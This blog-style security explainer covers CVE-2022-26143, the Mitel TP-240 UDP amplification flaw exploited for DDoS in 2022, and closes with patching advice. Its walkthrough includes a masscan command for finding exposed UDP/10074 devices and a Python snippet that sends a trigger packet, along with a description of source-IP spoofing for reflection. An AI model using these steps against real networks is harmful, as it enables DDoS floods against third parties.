CVE-2022-26143 is a major security vulnerability affecting the TP-240 (also known as tp240dvr) component found in Mitel MiCollab (before version 9.4 SP1 FP1) and MiVoice Business Express (through version 8.1). This flaw lets remote attackers steal sensitive information and launch a Denial of Service (DoS) attack, slamming the vulnerable system with traffic and degrading performance.
In early 2022—specifically, February and March—attackers in the wild began exploiting this bug as part of a new DDoS attack named TP240PhoneHome. This post breaks it down in clear language and also gives you technical and code details.
A Quick Look at the TP-240 (tp240dvr) Component
The TP-240 is used in call-handling and communications for Mitel systems—think of it as a middle-man handling important internal telephony signals. Its main job is to take traffic, process it, and send it to the right place. Unfortunately, it listens for certain packets on UDP port 10074 (by default), and this is the weak spot.
Here's what makes the bug dangerous
1. Unauthenticated Network Service: No login or handshake is required. Anyone with access to the public interface can talk to TP-240.
2. Reflected Amplification: The service responds to small trigger packets with huge replies, amplifying a tiny request into a huge response.
Sensitive Data Leak: Some responses can include internal information, helpful for attackers.
4. DDoS Helper: Attackers can spoof requests so victims receive the “amplified” traffic, overwhelming their network.
!CVE-2022-26143 Amplification
1. Finding Vulnerable Servers
Hackers look for Mitel devices exposing UDP port 10074.
# Use masscan to quickly map the internet
masscan -pU:10074 --rate=100 .../
2. Sending a Trigger Packet
Attackers send a special UDP packet. Here’s a simplified Python snippet (for educational purposes only):
import socket
target_ip = "TARGET_PUBLIC_IP"
target_port = 10074
# The magic bytes to trigger a long reply
payload = bytes.fromhex('000000000000000c0000000200000002')
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (target_ip, target_port))
data, _ = sock.recvfrom(4096)
print(f"Received {len(data)} bytes in response.")
> This tiny packet can return over 1,000 bytes. The ratio means attackers can multiply their output traffic by up to 220x per request!
3. DDoS Reflection
To amplify traffic to a victim, attackers spoof the source IP. Instead of them receiving the reply, the innocent victim does. Since the response is much larger than the trigger, one attacker can flood big networks by using many vulnerable Mitel devices as "reflectors".
Evidence of Real-World Exploitation
- February–March 2022: Threat actors employ thousands of Mitel devices, creating a “flood” with new amplification DDoS vectors.
- Researchers from Zayo, Netscout, and Cloudflare report seeing these “reflection” campaigns in wild:
- Cloudflare blog: "Mitel DDoS amplification attack"
- Netscout: "Mitel Device Reflector Attack"
- Original CVE entry
Upgrade MiVoice Business Express to newer than 8.1.
- Official Mitel advisory: Mitel Security Bulletin
Technical Summary
- Vulnerability: Unauthenticated UDP service, reflects and amplifies traffic, leaks sensitive info.
CVSS Score: 7.5–8.6
- How to Fix: Patch & block UDP/10074
- Original Disclosure: CVE-2022-26143 NVD, Mitel Advisory 22-0002
Final Thoughts
CVE-2022-26143 stands as a textbook example of why unauthenticated, internet-exposed services are dangerous. Even a telephony device can be repurposed as a DDoS cannon by bad actors. If you or your business runs Mitel equipment, patch now—never assume your phone gear is "safe enough" just because it isn’t a web server!
Sources
- CVE-2022-26143 on NVD
- Mitel Official Security Advisory 22-0002
- Cloudflare Blog on Mitel DDoS
- Netscout DDoS Reflection Report
Timeline
Published on: 03/10/2022 17:47:00 UTC
Last modified on: 03/18/2022 19:52:00 UTC